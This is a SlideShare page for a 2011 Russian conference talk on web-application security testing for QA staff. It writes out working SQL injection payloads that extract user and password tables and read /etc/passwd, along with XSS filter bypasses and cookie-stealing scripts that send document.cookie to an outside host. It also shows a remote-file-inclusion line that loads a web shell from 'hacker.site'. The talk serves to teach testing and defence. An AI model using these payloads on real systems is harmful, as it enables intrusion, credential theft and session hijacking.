SlideShare ist ein Scribd-Unternehmen logo

Тестирование защищенности веб-приложений

Als PPTX, PDF herunterladen
SQALab
SQALab

Игорь Бондаренко - доклад на SQA Days, 2-3 декабря 2011, Москва

Bildung
1 von 56
Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co.
Зачем нужно тестировать защищенность • 90% сайтов опасны для пользователей и представляют угрозу бизнесу. • 43% сайтов не могут хранить конфиденциальную информацию в БД. • 80% Вебмастеров не обновляют opensource продукты вовремя. • 99,9% сайтов, которые имеют уязвимость, имеют еще несколько уязвимостей. • 48% серверов имеют уязвимости на уровне операционной системы и приложений.
SQL Injection • Внедрение SQL-кода — один из распространѐнных способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода.
Что может получить злоумышленник
Архитектура уязвимости типа SQL Injection
Простейший способ обнаружить уязвимость Добавляем одинарную кавычку к запросу: • http://www.site.com/?id=1‘ Получаем ошибку типа: • Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/mysite/www/htdocs/include/lib/news.php Или • Видим ту же самую страницу что и по ссылке http://www.site.com/?id=1
Почему так происходит? query = "SELECT * FROM news WHERE id = '" + id + "'" SELECT * FROM news WHERE id = '1''
Какие еще есть способы проверки? • Использование простых арифметических операций в запросе: • site.com/index.php?id=2-1(Выводит страницу 1) • site.com/index.php?id=1*2(Выводит страницу 2) • site.com/index.php?id=1+and+1=1(Выводит страницу 1) • Использование сортировки в запросе: • site.com/index.php?showthread=285+ORDER+BY+1--+ • Подстановка бессмысленной информации в запрос • site.com/index.php?id=1 anything (Выводит сообщение об ошибке)
Как этим пользоваться? /?id=1' UNION SELECT user,password FROM users-- SELECT title,text FROM news WHERE id = '1' SELECT title,text FROM news WHERE id = '1' UNION SELECT user,password FROM users
Blind SQL injection • Тестирование истинных и ложных запросов: • site.com/index.php?id=2’ AND ‘1’ = ‘1’-- • site.com/index.php?id=2’ AND ‘1’=‘2’-- • Вывод информации в отчете об ошибках: • site.com/index.php?id=2’ OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID(VERSION(), FLOOR(RAND(0)*2), 64)) -- Duplicate entry '5.0.45' for key 1
Double-blind injection • Посимвольный перебор с помощью Benchmark: • site.com/index.php?id=2’ OR id= IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, BENCHMARK(2999999,MD5(NOW()))) – • Способ навредить серверу БД: • site.com/index.php?id=2’ AND BENCHMARK(100000, BENCHMARK(100000,md5(current_time)))
На что еще обращать внимание? • URL: http://www.google.com/search?q=inurl:select+inurl:%2520+inurl:from+inurl:whe re
Практика, или SQL Injection глазами злоумышленника 1. Определение типа базы данных 2. Проверка прав пользователя на запись файлов 3. Подбор количества столбцов 4. Определение вывода на экран 5. Получение информации о таблицах 6. Получение информации о колонках в требуемой таблице 7. Получение данных из таблицы и вывод на экран
Ошибки характерные для разных видов баз данных PostgreSQL Access MS SQL InterBaseFire Oracle Sybase bird Функции: [Microsoft][ODB [Microsoft][ODB ibase_query() ORA-01756 Sybase error pg_exec() C Microsoft C SQL Server ibase_fetch_obj (И вообще sybase_query() pg_numrows() Access Driver] Driver] ect() всякие ORA) sybase_num_ro или ws() Microsoft JET Database Engine error
Подбор количества столбцов 1. Простой перебор допустим у нас есть сайт с инъекцией: www.site.com/index.php?id=1‘ Выполняем такой запрос www.site.com/index.php?id=-1+UNION+SELECT+1,2,3 -- если появилась ошибка, то увеличиваем количество колонок на одну www.site.com/index.php?id=-1+UNION+SELECT+1,2,3,4 -- и так пока не исчезнет ошибка и появится пустая страница
2. Оператор ORDER BY www.site.com/index.php?id=-1+order+by+1-- ошибки нет, значит столбцов 1 или больше 1 www.site.com/index.php?id=-1+order+by+9999-- должна появится ошибка, значит столбцов меньше 9999 Далее подбираем таким образом правильное количество, предположим в нашем случае 4 столбца, тогда: www.site.com/index.php?id=-1+order+by+4-- (ошибки не будет) www.site.com/index.php?id=-1+order+by+5-- (ошибка есть)
Определение вывода Предположим мы подобрали количество столбцов и их оказалось 4 www.site.com/index.php?id=-1+union+select+null,null,null,null Теперь нас интересует в какой части страницы, какая колонка выводится. Для этого подставим вместо одного из null – произвольный набор символов, в нашем случае «111» www.site.com/index.php?id=-1+union+select+null,111,null,null--
Получаем информацию о версии и пользователе Для получения информации о текущем пользователе используется функция user() www.site.com/index.php?id=-1+union+select+null,user(),null,null-- Для определения версии используется функция version() www.site.com/index.php?id=-1+union+select+null,user(),null,null--
Чтение и запись файлов Проверка возможности чтения/записи файлов: www.site.com/index.php?id=- 1+union+select+null,file_priv,null,null+union+select+file_priv+from+ mysql.user+where+user= ‘%USERNAME%'-- Чтение файла www.site.com/index.php?id=- 1+union+select+null,file_priv,null,null+union+select+ union+select+LOAD_FILE('/etc/passwd')+from+mysql.user--
Узнаем таблицы Для получения информации о таблицах и колонках необходимо обратиться к служебной таблице Information_schema www.site.com/index.php?id=- 1+union+select+null,TABLE_NAME,null,null+from+INFO RMATION_SCHEMA.TABLES-- Таким запросом мы узнаѐм первую таблицу, но нам надо узнать и другие www.site.com/index.php?id=- 1+union+select+null,TABLE_NAME,null,null+from+INFO RMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+1--
Получаем информацию о колонках Перебрав таблицы, определяем ту которая нам будет интересна. Пусть это будет USER, что требуется для получения информации о колонках: www.site.com/index.php?id=-1+union+select+null,COLUMN_NAME,null,null+from+INF ORMATION_SCHEMA.COLUMNS-- Таким обрfзом мы выводим названия колонок всех таблиц. Но нам надо узнать имена колонок именно в таблице USER Изменяем немного наш запрос добавляя в него оператор WHERE: www.site.com/index.php?id=-1+union+select+null,COLUMN_NAME,null,null+from+INF ORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='user'-- Появится имя первой колонки в таблице user и далее добавляя LIMIT+OFFSET узнаём все колонки.
Фильтрация кавычек Чаще всего, проделав действия описанные на предыдущем слайде, вы увидите ошибку: ERROR: syntax error at or near "user" at character 122 http://www.paulschou.com/tools/xlate/ www.site.com/index.php?id=- 1+union+select+null,COLUMN_NAME,null,null+from+INF ORMATION_SCHEMA.CO LUMNS+where+TABLE_NAME=chr(117)| |chr(115)||chr(101)||chr(114)--
Фильтрация кавычек Второй способ: использование вложенного подзапроса www.site.com/index.php?id=- 1+union+select+null,COLUMN_NAME,null,null+from+INF ORMATI ON_SCHEMA.COLUMNS+where+TABLE_NAME=(select+TABLE_ NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1+offset+ 1)--
Фильтация пробелов В случае фильтрации пробелов существуют следующий способы обхода фильтра: 1. Использование пробельных символов «/*!*/» и «/**/» SELECT * FROM news WHERE id='1'/**/UNION/**/SELECT/**/1,2,3,4,5,6/**/FROM/**/Users/**/WHERE/**/login='admi n'#‘ или SELECT * FROM news WHERE id='1'/*!UNION*/SELECT/*!1,2,3,4,5,6*/FROM/*!Users*/WHERE/*!login='admin'*/#' 2. Использование символов табуляции: %09 – табуляция %0A – символ новой строка %0D – возврат каретки %0B – вертикальная табуляция %0C – символ новой страницы http://xxx/news.php?id=1'%09UNION%09SELECT%091,2,3,4,5,6%09FROM%09Users% 0 9WHERE%09login='admin'#
Получение информации из таблицы Составляем запрос: www.site.com/index.php?id=- 1+union+select+null,username,null,null+from+user-- Он возвратит нам в данном случае имя пользователя Можно объединять 2 и более колонки разделяя их спец символом www.site.com/index.php?id=- 1+union+select+null,username||chr(58)||email,null, null+from+user-- Мы увидим запись типа Login:email
Уязвимость в скрипте авторизации Поле ввода имени пользователя: • Username’-- Поле ввода пароля: • 123' OR login='Admin' – • %
Демонстрация примеров
Программы для работы с инъекциями • SQL InjectMe – плагин для Firefox • Absinthe – утилита для проведения атак типа SQL Injection • SQL checker – анализатор возможности внедрения SQL кода
XSS XSS (Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных информационных систем в вебе. XSS возникает, когда в генерируемые сервером страницы по какой-то причине попадают пользовательские скрипты.
XSS
XSS • Цель Выполнить «чужеродный» JavaScript-код в браузере клиента, когда он находится на атакуемом сайте • Как это сделать? Внедрить куда-нибудь фрагмент кода типа <script>...</script> <a onmouseover="..."/> <img src="javascript:..."/>
Классификация XSS • Активный XSS – Внедренный скрипт сохраняется в системе и становится доступен для вывода другим пользователям • Пассивный XSS – Скрипт передается системе в параметрах HTTP-запроса с последующим их выводом в HTML-страницу.
Чем мы рискуем? • Кража Cookies var іmg = new Image(); іmg.srс = 'http://site/xss.php?' + document.cookie; • Кража аутентификационных данных – добавление обработчика события onsubmit к существующей форме – добавление формы с просьбой ввести пароль • Перенаправление пользователя на страницы злоумышленников • DDOS атаки
Метод обнаружения /?id="><script>alert(1)</script> HTML - код страницы примет вид .. <font size = ""><script>alert(1)</script>"... В результате браузер выполнит скрипт.
Типичный случай Самая распространенная разновидность XSS: "><script>alert()</script> Вся суть в "> После добавления к форме "><script>alert()</script> какой-то переменной присваивается значение поля. Переменная обрабатывается, "> закрывает скрипт и выполняет <script>alert()</script>
Фильтры: определяем наличие и качество В любое поле вводим проверочную строку: '';!--"<XSSTEST>=&{()} Далее открываем HTML страницы, ищем слово "XSSTEST" и смотрим на прилегающие к нему символы. • Если символы <> остались – это первый признак наличия уязвимости • Если символы ,"' остались такими, как были введены – это второй признак уязвимости (возможно использование дополнительных символов в последующей XSS атаке) • Если в HTML, вы не обнаружили <> - это признак отсутствия фильтрации. • Если открыв HTML вы обнаружили, что <> заменены на другие символы – фильтр функционирует нормально.
Практика • Допустим фильтр экранирует <> В этом случае существует вероятность обхода фильтра. К примеру, фильтр настроен на удаление <script>,<> и . Для проверки используем конструкцию типа <testxss555> и проверяем, если фильтр не удалил запись - можно составить XSS-скрипт. К примеру вот так: <sc<script>ript>alert()</sc</script>ript>
Автозакрывающиеся скобки: >>>><<script бывает, что фильтр подсчитывает открывающиеся и закрывающиеся скобки и закрывает сам. Автозакрытие тегов: Бывает что фильтр дополняет скрипт, к примеру вот этим : "> http://site.ru/trye.asp?sessionID="><IMG%20SRC="javascript:alert(); Фильтр проверяет, что ничего опасного в <IMG%20SRC="javascript:alert(); нет, закрывает тег и тем самым выполняет вредоносный скрипт.
Кража Cookies До этого мы рассматривали скрипты типа: <script>alert (' Test ')</script> javascript:alert (' Test ')/ javascript:alert(' Test ')/1.jpg и так далее.. Теперь рассмотрим следующий скрипт: <script> img = new Image(); img.src = "http://test.com/s/Hack.gif?"+document.cookie; </script> В данном виде скрипт перехватывает cookies пользователя.
Как воспользоваться этим скриптом? 1. http://site.ru/free?p='><script>img=new Image();img.src="http://test.com/s/Hack.gif?"+document.cookie;"+document.cookie;</ script> 2. http://site.ru/free?p='><script src=http://test.com/script/js.js></script> При этом файл js.js содержит: img=new Image();img.src="http://test.com/s/Hack.gif?"+document.cookie; этот способ более надѐжен.
Изменение кодировки http://ha.ckers.org/xss.html Изначально скрипт выглядел так: http://cite.com/test?p='><script src=http://test.com/script/js.js></script> После: %68%74%74%70%3A%2F%2F%63%69%74%65%2E%63%6F%6D%2F%74%6 5%73%74%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%7 2%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%6E%65%7 4%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%7 3%63%72%69%70%74%3E%0A
DDoS-атака XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста — много запросов, которые не выдерживает атакуемый сервер. Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида: <img src="http://site.com/">
Демонстрация примеров
Инструменты для обнаружения XSS • XSSme – аддон для Firfox • DOMinator – анализатор наличия DOM-based XSS
PHP Injection PHP Injection или создание веб шеллов – это второй по популярности после SQL инъекции тип уязвимостей.
Уязвимые функции • Eval() • Include() • Require() • Create_function() • Preg_replace()
Виды инклудов <? .. Include ("$page.php"); … ?> Возможен Remote File Inclusion (RFI) <? .. Include ("files/$page.htm"); … ?> Возможен Local File Inclusion (LFI) с использованием нулл байта <? .. Include ("$patch/folder/page.php"); … ?> Возможен RFI при условии создания структуры /folder/page.php на удаленном сервере
Метод определения уязвимости • index.php?page=shop Подставим dsdsds вместо shop: Warning: main(dsdsds.php): failed to open stream: No such file or directory in /home/user/www//page.php on line 3 Warning: main(dsdsds.php): failed to open stream: No such file or directory in /home/user/www/page.php on line 3 Warning: main(): Failed opening 'dsdsds.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/usr/local/share/pear') in /home/user/www/page.php on line 3
Веб шелл Это происходит потому, что код страницы имеет такой элемент <? .. Include ("$page.php"); … ?> Как этим воспользоваться? index.php?page=http://hacker.site/shell Получаем веб шелл, который дает возможность исполнять любые php команды
Выход за пределы текущего каталога Apache Tomcat 5 версии ниже 5.5.22 и Apache Tomcat 6 ниже 6.0.10 подвержен уязвимости поволяющей перейти к содержимому вышестоящей директории путем указания в пути конструкции "../".
Инструменты для обнаружения • Graudit - семантически-статический анализатор кода • RIPS – утилита для поискам уязвимостей в PHP коде
Демонстрация примеров
Вопросы? Email: bondarenko.ihar@yandex.ru Twitter: @iharbondarenko Skype: igor.bondarenko1

Empfohlen

Тестирование уязвимостей веб приложений
Тестирование уязвимостей веб приложенийТестирование уязвимостей веб приложений
Тестирование уязвимостей веб приложений
SQALab
 
А не поговорить ли нам о XSS!
А не поговорить ли нам о XSS!А не поговорить ли нам о XSS!
А не поговорить ли нам о XSS!
SQALab
 
Sql инъекции в тестировании
Sql инъекции в тестированииSql инъекции в тестировании
Sql инъекции в тестировании
ISsoft
 
тестирование защищенности веб приложений
тестирование защищенности веб приложенийтестирование защищенности веб приложений
тестирование защищенности веб приложений
Zestranec
 
Максим Кочкин (Wamba)
Максим Кочкин (Wamba)Максим Кочкин (Wamba)
Максим Кочкин (Wamba)
Ontico
 
Атаки на web-приложения. Основы
Атаки на web-приложения. ОсновыАтаки на web-приложения. Основы
Атаки на web-приложения. Основы
Positive Hack Days
 
Alexei Sintsov - "Between error and vulerability - one step"
Alexei Sintsov - "Between error and vulerability - one step"Alexei Sintsov - "Between error and vulerability - one step"
Alexei Sintsov - "Between error and vulerability - one step"
Andrew Mayorov
 
ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA...
ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA...ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA...
ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA...
GoQA
 

Empfohlen

Тестирование уязвимостей веб приложений
Тестирование уязвимостей веб приложенийТестирование уязвимостей веб приложений
Тестирование уязвимостей веб приложений
SQALab
 
А не поговорить ли нам о XSS!
А не поговорить ли нам о XSS!А не поговорить ли нам о XSS!
А не поговорить ли нам о XSS!
SQALab
 
Sql инъекции в тестировании
Sql инъекции в тестированииSql инъекции в тестировании
Sql инъекции в тестировании
ISsoft
 
тестирование защищенности веб приложений
тестирование защищенности веб приложенийтестирование защищенности веб приложений
тестирование защищенности веб приложений
Zestranec
 
Максим Кочкин (Wamba)
Максим Кочкин (Wamba)Максим Кочкин (Wamba)
Максим Кочкин (Wamba)
Ontico
 
Атаки на web-приложения. Основы
Атаки на web-приложения. ОсновыАтаки на web-приложения. Основы
Атаки на web-приложения. Основы
Positive Hack Days
 
Alexei Sintsov - "Between error and vulerability - one step"
Alexei Sintsov - "Between error and vulerability - one step"Alexei Sintsov - "Between error and vulerability - one step"
Alexei Sintsov - "Between error and vulerability - one step"
Andrew Mayorov
 
ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA...
ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA...ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA...
ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA...
GoQA
 
Как мануальный тестировщик может базово протестировать безопасность, Евгений ...
Как мануальный тестировщик может базово протестировать безопасность, Евгений ...Как мануальный тестировщик может базово протестировать безопасность, Евгений ...
Как мануальный тестировщик может базово протестировать безопасность, Евгений ...
Sigma Software
 
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условияхАнализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
Dmitry Evteev
 
Стажировка-2014, занятие 6. Информационная безопасность и атаки на сервер.
Стажировка-2014, занятие 6. Информационная безопасность и атаки на сервер.Стажировка-2014, занятие 6. Информационная безопасность и атаки на сервер.
Стажировка-2014, занятие 6. Информационная безопасность и атаки на сервер.
7bits
 
Безопасность веб-приложений: starter edition
Безопасность веб-приложений: starter editionБезопасность веб-приложений: starter edition
Безопасность веб-приложений: starter edition
Andrew Petukhov
 
Sql injection
Sql injectionSql injection
Sql injection
Michal11221
 
Тестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях MicrosoftТестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях Microsoft
Dmitry Evteev
 
176023
176023176023
176023
whitepawn2012
 
Risspa domxss
Risspa domxssRisspa domxss
Risspa domxss
yaevents
 
Security testing
Security testingSecurity testing
Security testing
MageCloud
 
Безопасность веб-приложений. Так ли опасна виртуальная угроза?
Безопасность веб-приложений. Так ли опасна виртуальная угроза?Безопасность веб-приложений. Так ли опасна виртуальная угроза?
Безопасность веб-приложений. Так ли опасна виртуальная угроза?
phpdevby
 
XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.
Дмитрий Бумов
 
KazHackStan - "><script>alert()</script>
KazHackStan - "><script>alert()</script>KazHackStan - "><script>alert()</script>
KazHackStan - "><script>alert()</script>
Дмитрий Бумов
 
Ihor Bliumental – Is There Life Outside OWASP Top-10
Ihor Bliumental – Is There Life Outside OWASP Top-10Ihor Bliumental – Is There Life Outside OWASP Top-10
Ihor Bliumental – Is There Life Outside OWASP Top-10
OWASP Kyiv
 
Application security? Firewall it!
Application security? Firewall it!Application security? Firewall it!
Application security? Firewall it!
Positive Hack Days
 
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
Mikhail Egorov
 
Cоздание приложений со знанием Perl
Cоздание приложений со знанием PerlCоздание приложений со знанием Perl
Cоздание приложений со знанием Perl
Anatoly Sharifulin
 
Ihor Bliumental - Collision CORS
Ihor Bliumental - Collision CORSIhor Bliumental - Collision CORS
Ihor Bliumental - Collision CORS
OWASP Kyiv
 
Белов наиболее часто уязвимые места в веб приложениях
Белов наиболее часто уязвимые места в веб приложенияхБелов наиболее часто уязвимые места в веб приложениях
Белов наиболее часто уязвимые места в веб приложениях
qasib
 
Как начать тестировать безопасность уже сегодня
Как начать тестировать безопасность уже сегодняКак начать тестировать безопасность уже сегодня
Как начать тестировать безопасность уже сегодня
Sergey Belov
 
Pt devteev-risspa
Pt devteev-risspaPt devteev-risspa
Pt devteev-risspa
yaevents
 
CodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server APICodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server API
Sergey Belov
 
Сергей Федоров - Современная безопасность от Eset
Сергей Федоров - Современная безопасность от EsetСергей Федоров - Современная безопасность от Eset
Сергей Федоров - Современная безопасность от Eset
Expolink
 

Weitere ähnliche Inhalte

Was ist angesagt?

Анализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условияхАнализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
Dmitry Evteev
 
Стажировка-2014, занятие 6. Информационная безопасность и атаки на сервер.
Стажировка-2014, занятие 6. Информационная безопасность и атаки на сервер.Стажировка-2014, занятие 6. Информационная безопасность и атаки на сервер.
Стажировка-2014, занятие 6. Информационная безопасность и атаки на сервер.
7bits
 
Тестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях MicrosoftТестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях Microsoft
Dmitry Evteev
 
Risspa domxss
Risspa domxssRisspa domxss
Risspa domxss
yaevents
 
Security testing
Security testingSecurity testing
Security testing
MageCloud
 
Безопасность веб-приложений. Так ли опасна виртуальная угроза?
Безопасность веб-приложений. Так ли опасна виртуальная угроза?Безопасность веб-приложений. Так ли опасна виртуальная угроза?
Безопасность веб-приложений. Так ли опасна виртуальная угроза?
phpdevby
 
Application security? Firewall it!
Application security? Firewall it!Application security? Firewall it!
Application security? Firewall it!
Positive Hack Days
 
Белов наиболее часто уязвимые места в веб приложениях
Белов наиболее часто уязвимые места в веб приложенияхБелов наиболее часто уязвимые места в веб приложениях
Белов наиболее часто уязвимые места в веб приложениях
qasib
 
Pt devteev-risspa
Pt devteev-risspaPt devteev-risspa
Pt devteev-risspa
yaevents
 

Was ist angesagt? (20)

Как мануальный тестировщик может базово протестировать безопасность, Евгений ...
Как мануальный тестировщик может базово протестировать безопасность, Евгений ...Как мануальный тестировщик может базово протестировать безопасность, Евгений ...
Как мануальный тестировщик может базово протестировать безопасность, Евгений ...
 
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условияхАнализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
 
Стажировка-2014, занятие 6. Информационная безопасность и атаки на сервер.
Стажировка-2014, занятие 6. Информационная безопасность и атаки на сервер.Стажировка-2014, занятие 6. Информационная безопасность и атаки на сервер.
Стажировка-2014, занятие 6. Информационная безопасность и атаки на сервер.
 
Безопасность веб-приложений: starter edition
Безопасность веб-приложений: starter editionБезопасность веб-приложений: starter edition
Безопасность веб-приложений: starter edition
 
Sql injection
Sql injectionSql injection
Sql injection
 
Тестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях MicrosoftТестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях Microsoft
 
176023
176023176023
176023
 
Risspa domxss
Risspa domxssRisspa domxss
Risspa domxss
 
Security testing
Security testingSecurity testing
Security testing
 
Безопасность веб-приложений. Так ли опасна виртуальная угроза?
Безопасность веб-приложений. Так ли опасна виртуальная угроза?Безопасность веб-приложений. Так ли опасна виртуальная угроза?
Безопасность веб-приложений. Так ли опасна виртуальная угроза?
 
XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.
 
KazHackStan - "><script>alert()</script>
KazHackStan - "><script>alert()</script>KazHackStan - "><script>alert()</script>
KazHackStan - "><script>alert()</script>
 
Ihor Bliumental – Is There Life Outside OWASP Top-10
Ihor Bliumental – Is There Life Outside OWASP Top-10Ihor Bliumental – Is There Life Outside OWASP Top-10
Ihor Bliumental – Is There Life Outside OWASP Top-10
 
Application security? Firewall it!
Application security? Firewall it!Application security? Firewall it!
Application security? Firewall it!
 
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
 
Cоздание приложений со знанием Perl
Cоздание приложений со знанием PerlCоздание приложений со знанием Perl
Cоздание приложений со знанием Perl
 
Ihor Bliumental - Collision CORS
Ihor Bliumental - Collision CORSIhor Bliumental - Collision CORS
Ihor Bliumental - Collision CORS
 
Белов наиболее часто уязвимые места в веб приложениях
Белов наиболее часто уязвимые места в веб приложенияхБелов наиболее часто уязвимые места в веб приложениях
Белов наиболее часто уязвимые места в веб приложениях
 
Как начать тестировать безопасность уже сегодня
Как начать тестировать безопасность уже сегодняКак начать тестировать безопасность уже сегодня
Как начать тестировать безопасность уже сегодня
 
Pt devteev-risspa
Pt devteev-risspaPt devteev-risspa
Pt devteev-risspa
 

Andere mochten auch

Тестирование Локализации и Интернализации
Тестирование Локализации и ИнтернализацииТестирование Локализации и Интернализации
Тестирование Локализации и Интернализации
Lilia Gorbachik
 
Intercepter-NG: сниффер нового поколения
Intercepter-NG: сниффер нового поколенияIntercepter-NG: сниффер нового поколения
Intercepter-NG: сниффер нового поколения
Positive Hack Days
 
очир абушинов
очир абушиновочир абушинов
очир абушинов
Alexei Lupan
 

Andere mochten auch (20)

CodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server APICodeFest 2014 - Pentesting client/server API
CodeFest 2014 - Pentesting client/server API
 
Сергей Федоров - Современная безопасность от Eset
Сергей Федоров - Современная безопасность от EsetСергей Федоров - Современная безопасность от Eset
Сергей Федоров - Современная безопасность от Eset
 
SerVal site monitoring presentation - Презентация SerVal
SerVal site monitoring presentation - Презентация SerValSerVal site monitoring presentation - Презентация SerVal
SerVal site monitoring presentation - Презентация SerVal
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websites
 
Тестирование Локализации и Интернализации
Тестирование Локализации и ИнтернализацииТестирование Локализации и Интернализации
Тестирование Локализации и Интернализации
 
Intercepter-NG: сниффер нового поколения
Intercepter-NG: сниффер нового поколенияIntercepter-NG: сниффер нового поколения
Intercepter-NG: сниффер нового поколения
 
4.3. Rat races conditions
4.3. Rat races conditions4.3. Rat races conditions
4.3. Rat races conditions
 
анализ кода: от проверки стиля до автоматического тестирования
анализ кода: от проверки стиля до автоматического тестированияанализ кода: от проверки стиля до автоматического тестирования
анализ кода: от проверки стиля до автоматического тестирования
 
Safety versus security
Safety versus securitySafety versus security
Safety versus security
 
Сергей Полаженко - Security Testing: SQL Injection
Сергей Полаженко - Security Testing: SQL InjectionСергей Полаженко - Security Testing: SQL Injection
Сергей Полаженко - Security Testing: SQL Injection
 
Идентификация и аутентификация - встроенные функции безопасности или задачи с...
Идентификация и аутентификация - встроенные функции безопасности или задачи с...Идентификация и аутентификация - встроенные функции безопасности или задачи с...
Идентификация и аутентификация - встроенные функции безопасности или задачи с...
 
Непрерывный анализ качества кода с помощью SonarQube
Непрерывный анализ качества кода с помощью SonarQubeНепрерывный анализ качества кода с помощью SonarQube
Непрерывный анализ качества кода с помощью SonarQube
 
PiterPy#3. DSL in Python. How and why?
PiterPy#3. DSL in Python. How and why?PiterPy#3. DSL in Python. How and why?
PiterPy#3. DSL in Python. How and why?
 
очир абушинов
очир абушиновочир абушинов
очир абушинов
 
О чем мы забываем в QA или “Знакомьтесь – Manageability!”
О чем мы забываем в QA или “Знакомьтесь – Manageability!”О чем мы забываем в QA или “Знакомьтесь – Manageability!”
О чем мы забываем в QA или “Знакомьтесь – Manageability!”
 
10 советов художника тестировщику
10 советов художника тестировщику10 советов художника тестировщику
10 советов художника тестировщику
 
Разработка методики тестирования производительности комплекса систем
Разработка методики тестирования производительности комплекса системРазработка методики тестирования производительности комплекса систем
Разработка методики тестирования производительности комплекса систем
 
Использование cygwin для автоматизации процессов тестирования в Windows
Использование cygwin для автоматизации процессов тестирования в WindowsИспользование cygwin для автоматизации процессов тестирования в Windows
Использование cygwin для автоматизации процессов тестирования в Windows
 
Качество отсутствует, коль баги присутствуют
Качество отсутствует, коль баги присутствуютКачество отсутствует, коль баги присутствуют
Качество отсутствует, коль баги присутствуют
 
Тестирование и техподдержка брак или сотрудничество?
Тестирование и техподдержка брак или сотрудничество?Тестирование и техподдержка брак или сотрудничество?
Тестирование и техподдержка брак или сотрудничество?
 

Ähnlich wie Тестирование защищенности веб-приложений

Advanced Sql Injection
Advanced Sql InjectionAdvanced Sql Injection
Advanced Sql Injection
Dmitry Evteev
 
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Dmitry Evteev
 
CC HackQuest 2010 Full Disclosure (мастер-класс)
CC HackQuest 2010 Full Disclosure (мастер-класс)CC HackQuest 2010 Full Disclosure (мастер-класс)
CC HackQuest 2010 Full Disclosure (мастер-класс)
Dmitry Evteev
 
Тестирование программных фильтров безопасности
Тестирование программных фильтров безопасностиТестирование программных фильтров безопасности
Тестирование программных фильтров безопасности
Zestranec
 
Методы обхода Web Application Firewall
Методы обхода Web Application FirewallМетоды обхода Web Application Firewall
Методы обхода Web Application Firewall
Dmitry Evteev
 
безопасность веб приложений сегодня. дмитрий евтеев. зал 4
безопасность веб приложений сегодня. дмитрий евтеев. зал 4безопасность веб приложений сегодня. дмитрий евтеев. зал 4
безопасность веб приложений сегодня. дмитрий евтеев. зал 4
rit2011
 
Безопасность веб-приложений сегодня
Безопасность веб-приложений сегодняБезопасность веб-приложений сегодня
Безопасность веб-приложений сегодня
Dmitry Evteev
 
Web осень 2013 лекция 9
Web осень 2013 лекция 9Web осень 2013 лекция 9
Web осень 2013 лекция 9
Technopark
 
Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)
Dmitry Evteev
 

